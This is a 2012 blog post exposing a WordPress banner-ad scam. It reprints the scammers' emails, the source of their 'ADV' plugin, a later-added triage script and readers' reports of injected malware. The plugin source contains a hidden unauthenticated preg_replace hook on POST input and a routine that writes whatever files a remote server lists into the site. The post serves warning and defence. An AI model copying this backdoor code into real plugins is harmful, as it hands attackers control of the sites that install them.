Banner Ads Scam with ADV Plugin for WordPress
February 1st, 2012 by Michal Miksik

A true story which might help someone out there
(I have replaced the real domain name with DOMAIN.COM):

A couple of days ago I received a few emails written in not-that-good English from “Valentin Lopez representing the Gera Agency” (vlopez@geraagency.com), apparently a French marketing company based in Paris. You can find the complete text of the emails below in this article (apart from the domain name).


First Email
The first email was pretty brief. I didn’t pay much attention to it but replied asking for more information on the subject.

What was strange, though, was that someone was willing to buy banner ad space on a site which is under construction, having only a few pages with actual content and getting only a small amount of traffic (it is a WordPress site).

Subject: We would like to buy banner space on DOMAIN.COM.
 
Hi,
 
I am sorry I have to write you to e-mail from whois information of the domain. 
But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site DOMAIN.COM.
Is it possible to place banner on your site on a fee basis?
 
Best regards,
 
Valentin Lopez

Second Email
This was more interesting: the banners are supposed to be for a well-known brand! It now also mentions the company name (Gera Agency) and contact details, including a fake-ish phone number.

Hello,
 
Thanks for reply to our proposal!
 
I represent Gera Agency. At the moment we are preparing an advertising campaign for Lacoste Company 
(it is a French company producing clothes, footwear, perfumery etc.) 
We already have designed banners for the campaign, they are the following sizes: 
160x600, 240x400, 300x250, 336x280, 468x60, 728x90.
What can be your price for one banner (banner should appear at ALL pages of your site) 
of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? 
Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
 
Best regards,
 
 
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

A quick look at the email headers gave more information:

Received: from colo-69-172-130-14.pilosoft.com (HELO nanaagency.com) (69.172.130.14)
          by colo-69-172-130-14.pilosoft.com with SMTP; 30 Jan 2012 ...
Message-ID: <something@nanaagency.com>

So we also have a Nana Agency going on, and the site is the same (apart from the Agency name). I have googled both but did not find any further information about these fictional agencies.

The Gera Agency domain shows no PageRank or Alexa Rank, and a search in archive.org reveals that the domain name was previously used by some travel agent, so it is probably a dropped domain name.

A Whois search unfortunately doesn’t give much info apart from the fact that the domain owner wishes to stay anonymous.
But it indicates that the domain was registered on the same day, possibly even after the First Email was sent.

Creation Date: 30-Jan-2012  
Expiration Date: 30-Jan-2013
 
Administrative Contact:
    PrivacyProtect.org
    Domain Admin        ()
    ID#10760, PO Box 16
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Nobby Beach
    null,QLD 4218
    AU
    Tel. +45.36946676

I just replied that I would like to see the banners first, and a third email came in.

Third Email
A brief one with a link to a “little app” for managing banner ads. It did indeed show those animated gif banners prepared in different variations and sizes to choose from.

Hi!
Here you can see our banners: http://docs.geraagency.com/lacoste/?view=1
 
 
Best regards,
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

I have finally given some inadequate prices and a fourth email came in without any negotiations.

Fourth Email
To my surprise, someone had taken the effort to set up my account in the banner ad manager with the correct sizes, domain name etc. From the control panel one can download a WordPress plugin for placing the banner ads, called the “ADV Plugin”. There is also a help page with instructions.

Hi!
 
Thanks for reply to our proposal!
We like your price.
To pass to the banner control system follow the link http://webmaster.geraagency.com
To enter use the following data:
 
login: DOMAIN.COM
password: *********
 
 
You should install and activate the plugin in order to display advertisement. 
Before making payment, advertiser must approve location of the banner. 
The banner will be shown on your site when you add special code to your web- address 
(for example: http://DOMAIN.COM/?adv_test=1). 
It means, that visitors will see the banner only if it is approved and payment made.
 
To get installation instruction for your site type pass to: http://docs.geraagency.com/wp_install
To activate your site you have to enter the code: *********
 
What way of payment is suitable for you?
 
Best regards,
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

The plugin creates new directories and downloads stuff from the above-mentioned domain/s, putting the fate of the site in the hands of the Gera (or any other name) Agency.

It does read settings from a "config" file where it can take multiple items from 
<banner_item>anything here even .mydodgyscript.php</banner_item>
and one match from 
<show_banner>anything here</show_banner>
and it displays only the item specified in <show_banner></show_banner>.

So in theory one can click Download Banners and it can download a somebanner.gif and somethingdodgy.php and show only the somebanner.gif, all looking fine, then use somethingdodgy.php to take control, upload, download, delete, modify…

What really happens with this plugin I don’t know as I have never installed it on my server, but it depends on the people in control of the config file…

You can find the plugin code below.
The same concept is used on many domains and under different “Agency” names. I hope this helps someone …

  • Noah Vincent / Legretto Agency
  • Tristan Muller / Gana Agency
  • Valentin Lopez / Gera Agency
  • Matthieu Colin / NanaAgency
  • Oscar Meunier / Kervel Agency
  • Eliott Arnaud / Larko Agency
  • Lilian Marchand / Lemma Agency
  • Rayan Meyer / Bevesto Agency
  • and others …
 
/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */
 
class AdvWidget extends WP_Widget {
 
    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }
 
    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }
 
    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }
 
    function form($instance) {
 
    }
 
}
 
add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));
 
add_action('admin_menu', 'advPluginMenu');
 
register_activation_hook(__FILE__, 'advActivation');
 
define('ADV_SERVICE_DOMAIN', 'geraagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');
 
function advReadUrl($url) {
    if (function_exists('curl_init')) {        
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}
 
function advActivation() {
    update_option('adv_place', 'widget');
}
 
register_deactivation_hook(__FILE__, 'advDeactivation');
 
function advDeactivation() {
    delete_option('adv_key');
}
 
function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}
 
function adv_show_banner() {
    advShowBanner();
}
 
function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}
 
function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message" class="updated"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message" class="updated"><p>Code activation error.</p></div>';
    }
}
 
function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message" class="updated"><p>Banners are downloaded successfully.</p></div>';
    }
}
 
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');
 
function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }
 
    $advPlace = get_option('adv_place');
    echo '<div class="wrap">';
 
    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment. To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';
}
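
Added example (not part of the original post or of the plugin): a triage script for the traces this version leaves behind, covering the server-driven download in downloadBanners() described above and the injected `eval(base64_decode(` code reported in the comments below. The function names, report labels and the list of accepted image extensions are assumptions of this example.

```bash
#!/usr/bin/env bash
# Added example: triage a WordPress tree for traces of the ADV plugin version
# listed on this page. Function names, report labels and the set of accepted
# image extensions are assumptions of this example, not part of the plugin.

# Files under <root>/adv_banners that are not images by extension, or that
# contain a PHP open tag whatever their extension. downloadBanners() writes
# whatever names the server lists in <banner_item>, so these need a look.
adv_dropped_files() {
    [ -d "$1/adv_banners" ] || return 0
    {
        find "$1/adv_banners" -type f ! -iname '*.gif' ! -iname '*.jpg' \
            ! -iname '*.jpeg' ! -iname '*.png' -print
        find "$1/adv_banners" -type f -exec grep -lF '<?php' {} + || true
    } | sort -u
}

# PHP files carrying the eval(base64_decode( injection quoted in the comments.
adv_injected_php() {
    find "$1" -type f -name '*.php' -exec \
        grep -lE 'eval[[:space:]]*\([[:space:]]*base64_decode' {} + || true
}

# Copies of the plugin itself, matched on two strings from the listing: the
# ADV_SERVICE_DOMAIN constant and the 'cadv' request parameter, which feeds a
# preg_replace() call that sits outside every function and permission check.
adv_plugin_copies() {
    find "$1" -type f -name '*.php' -exec \
        grep -lF -e 'ADV_SERVICE_DOMAIN' -e "['cadv']" {} + || true
}

# Print one labelled line per finding; return 1 if anything was found.
adv_triage() {
    report=$(
        adv_dropped_files "$1" | sed 's/^/DROPPED   /'
        adv_injected_php "$1" | sed 's/^/INJECTED  /'
        adv_plugin_copies "$1" | sed 's/^/PLUGIN    /'
    )
    if [ -z "$report" ]; then
        echo "no ADV traces found under $1"
        return 0
    fi
    printf '%s\n' "$report"
    return 1
}

# Run as: bash adv_triage.sh /path/to/wordpress
if [ -n "${1:-}" ]; then adv_triage "$1"; fi
```

In the listing, advDeactivation() deletes only the adv_key option, so the adv_banners directory and the other adv_* options stay behind after the plugin is deactivated. A clean result covers only the indicators of this version.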


  • Zender

    Just received an inquiry from Valentin Lopez for the same banner space scheme. Looks like they’re still working this scam. Thank you for posting this so I can avoid wasting my time!

    • http://moonpixel.com Moonpixel

      Glad it was useful!

      • UNINCORPORATED

        I was about to download and install plug-in. Thank you Moonpixel

  • Kim

    Thank you for posting this. They sent me an email, too, and I was searching to see if they were legit when I found your post. I appreciate you taking the time to help the rest of us avoid this scam.

  • Katie

    Got an email from the same guy this morning! Thanks for posting this – so glad I decided to google the name / agency. 

  • http://twitter.com/LoriSoard Lori Soard

    Thanks for posting. The e-mail requesting that I install a plug-in sent up red flags for me, so I decided to Google the agency and came across your post.

  • Marco

    Hi, I also received this email a few days ago; he says he’s from “gera agency” from Paris but he came across my website through a pilosoft.com IP based in NY. But I don’t see your point: if they pay you, where’s the problem? If they don’t pay you, just erase the widget… or am I missing anything?

    • http://moonpixel.com Moonpixel

      Hi Marco
      apart from it all being a scam, if you install and activate the plugin on your site you will give someone access to your site, so someone will be able to remotely upload stuff to your site – it could be malware or anything…
      Removing the plugin does not remove the stuff uploaded via the plugin…

  • Myfairies

    I accepted their offer back in November and the plugin stayed for nearly 3 days. What are the effects of it? What should I search for? I forgot about it, I just found some other sites talking about it and now I feel scared. I did not have any effects as far as I know. Could you please help me?

    • http://moonpixel.com Moonpixel

      This particular version (there could be other variations) creates a directory called “adv_banners” in the root of your site. In that dir there will be a set of other dirs, probably with the campaign name and sizes, and inside those should be the stuff uploaded upon hitting the Download Banners link, so this is where to look in the first place.
      But ideally get your hosters to check all your files for malware.

      It does read settings from a “config” file where it can take multiple items from
      <banner_item>anything here even .mydodgyscript.php</banner_item>
      and one match from
      <show_banner>anything here</show_banner>
      and it displays only the item specified in <show_banner></show_banner>.

      So in theory one can click Download Banners and it can download a somebanner.gif and somethingdodgy.php and show only the somebanner.gif, all looking fine, then use somethingdodgy.php to take control, upload, download, delete, modify…

      What really happens with this plugin I don’t know as I have never installed it on my server, but it depends on the people in control of the config file…

  • Anders

    Hi, thanks for the info. Valentin Lopez contacted me too. I installed the plugin and had it there for 1 hour before I found your info on the Internet. I have deleted the plugin but don’t feel so safe. Is it possible for them to connect to other sites that I have, or just the URL where the plugin was installed? I have sent an email to my host to let them take a look, but I’m not sure that they will do that… Any advice?

    • http://moonpixel.com Moonpixel

      Hi Anders, it’s hard to tell, if your other sites are in the same hosting account then possibly yes, if you have shell access you could do something like (if you’re on linux) find . -mmin -180 to find all files modified within last 3 hrs …

  • Jonathan Pochini

    Thanks a lot!
    Now they call themselves Gana Agency and the contacts in the email look like:
    Tristan Muller.
    site: http://www.ganaagency.com
    e-mail: tmuller@ganaagency.com
    phone: + (0)9 78 62 79 65

    • http://moonpixel.com Moonpixel

      Thanks Jonathan for the update!

  • Luca

    Got this email over the weekend, and stupidly installed the plugin yesterday. They were using the name Leggeto Agency. I have deleted the plugin and the directory it created called adv_banners. I scanned my FTP directory for other files that have been modified since I installed the plugin. There do not appear to be any more files modified from that time. Does this mean I have successfully eradicated the threat? Thanks for any help. I’ve contacted my hosting’s tech support with my issue, but they say it will take 2-4 hours to resolve, and I’ve taken matters into my own hands.

    • http://moonpixel.com Moonpixel

      Thx for the update, I think so, if it is the same version, no files modified and you removed it I think you’re fine. But definitely get your hosting company to check stuff…

    • http://thesmartphoneappreview.com Simon Burns

      Hi, please check your update.php and wp-settings.php, as this plugin added serious malware to mine

  • Jeff

    Noah,

    Just received this offer from Noah Vincent at the Legretto Agency (www.legretto.com), but the email exchange is the same.  I won’t be installing this junk, and thanks so much for alerting everyone to it!

  • Webmaster

    One more here… this is how the conversation goes:

    Hello,

    Thanks for reply to our proposal!

    I represent Rezatta Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
    What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.

    Best regards,
    Samuel Blanchard.
    site: www. rezatta. com
    e-mail: sblanchard@rezatta.com
    phone: + (0)9 78 62 65 38

    • http://bank-credits.com/ Credit Card Debt

      Hi!

      Unfortunately, the advertiser rejected your site. He has already gained the required number of advertising platforms for this season. Sorry for trouble you. You can remove plug-in.  As soon as our client resumes an advertising campaign we will contact you. Thank you and hope to cooperate with you in the future!
      Best regards,
      Samuel Blanchard.
      site: www.rezatta.com
      e-mail: sblanchard@rezatta.com
      phone: + (0)9 78 62 65 38

  • Webmaster

    …and then…
    Hi!

    Thanks for reply to our proposal!
    We like your price.
    To pass to the banner control system follow the link webmaster. rezatta. com
    To enter use the following data:

    login: www. yourwebsite. com
    password: 6W8GG4Z

    You should install and activate the plugin in order to display advertisement. Before making payment, advertiser must approve location of the banner. The banner will be shown on your site when you add special code to your web- address (for example: http://www.yourwebsite.com/?adv_test=1). It means, that visitors will see the banner only if it is approved and payment made.

    To get installation instruction for your site type pass to: http://docs. rezatta. com/wp_install
    To activate your site you have to enter the code: 5V7-MXK-SUU

    What way of payment is suitable for you?

    Best regards,
    Samuel Blanchard.
    site: www. rezatta. com
    e-mail: sblanchard@rezatta.com
    phone: + (0)9 78 62 65 38

  • http://thesmartphoneappreview.com Simon Burns

    Hi,

    This adv thing adds malware to .php files.

    I would recommend everyone scan their site after removing this plugin. My wp-settings.php and my update.php files had malware added to them in the form of: 

    // Start cache settings
    eval(base64_decode(‘Cg0KCmRl

    This is very very serious.

    The whole cache settings part should be removed, along with the lines of gobbledegook. Go through your site with an FTP fine comb and remove anything to do with the ad plugin, I found it in three places.

    Just because you have uninstalled the plugin doesn’t mean the malware has gone!!!!

    Avoid these guys like the plague!

    • http://moonpixel.com Moonpixel

      Thanks for the heads-up Simon!

    • Info

      Hi, Scan your site? How can I do that? Any plugin? I tell my hosting company to check but they just give me a long list of things that I can do. I thought that the hosting company can help with things like this.

      So if anyone has a good plugin or software to recommend, so I can scan my sites, I will be happy.

      Thanks!

      I removed the plugin after some mins, but when I delete the plugin from the server, the catalog is still there?

      • http://moonpixel.com Moonpixel

        There are different WP plugins you could use, for example Antivirus – this scans only the theme files I think, if you want more in depth scan you could use http://www.websitedefender.com/

        If you have shell access you could use:

        find . -mmin -180

        to find all files modified within last 3 hrs

        find . -name '*.php' -print0 | xargs -0 grep 'base64_decode'

        to find all files with extension .php which contain base64_decode

        NOTE: all these methods mentioned above can/will find also other files which might not be “harmful”,  so best to get your hosting company to help you

  • Sue

    OMG I almost uploaded the plugin..got this inkling to just google ‘adv plugin’ seconds before I click upload. Thank you for posting this n taking the time to warn the rest of us.

    Btw they used this address too..

    Ilyes Leclerc.
    site: www. melnel .com
    e-mail: ileclerc@melnel.com
    phone: + (0)9 78 62 95 19

  • http://twitter.com/jack_on_a_plane Jack P

    I just got this email today, from a Thibault Lucas from nettero. com. I became suspicious

  • http://twitter.com/jack_on_a_plane Jack P

    I received this email today and unfortunately got as far as installing the plugin. The email came from a
    Thibault Lucas with an @nettero.com email address. I became suspicious when looking at the whois for nettero .com and seeing it was registered yesterday. I’m now in the process of checking each file for base_decode.

    • http://moonpixel.com Moonpixel

      thx for the update Jack

  • Neil

    I thought I smelled a scam.  Thanks for confirming!  Got the first email today from a Jules Rolland, @ marreto .com.

    • Chris

      I got the same one from Jules just a week ago

  • Kim Prince

    Just happened to me.  SO glad I googled it and found this post.  Thank you.

  • http://sunshineandsippycups.com/ Meagan Paullin

    I just went through a MAJOR crisis due to this plugin!!!

    It’s been on my site for over 8 months – I fell for this scam when I was a new blogger. Installed it, then was so overwhelmed and busy as the site grew really quickly, and just forgot all about it. It was the first plugin on the page, right above Akismet, and I honestly kept thinking that it was something similar to that, something to keep the site safe, and never paid much attention to it. No idea how I forgot what it was all about – I would have deleted it MONTHS ago!

    Well, suddenly I get an email from Google telling me that I have malware on my site, and my site is then blocked with that big red warning page. EEK! I spent days trying to find the problem – we’d delete the malicious code and it would come right back. It was causing huge nasty porn pop ups everywhere.

    But, after deleting this plugin, and clearing the files again – It looks like it’s finally safe again!!!! Woo Hoo! But I now have to wait until the Google Gods decide to clear my site again, and allow that big message to be removed. I’ve lost almost 3 days of traffic now, and it’s killing me.

    Thank you SO much for this post – this is how we figured out the problem!!

  • Campingmemories

    I too received this a few weeks ago………..totally a scam…………

    Hello,

    Thanks for reply to our proposal!

    I represent Marreto Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
    What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.

    Best regards,
    Jules Rolland.
    site: www. marreto. com
    e-mail: jrolland@marreto. com
    phone: + (0)9 78 62 26 11

  • Realttorney

    I got a message from Jules Rolland yesterday. Thanks for this post. It was very helpful.

  • Yas Ayub

    Good Scam, I got an email from Marretoo Agency, glad I googled it before installing. Thank you for the post.. thank you

  • Jerminix

    Got also an email from Marreto days ago.. thanks for the information.
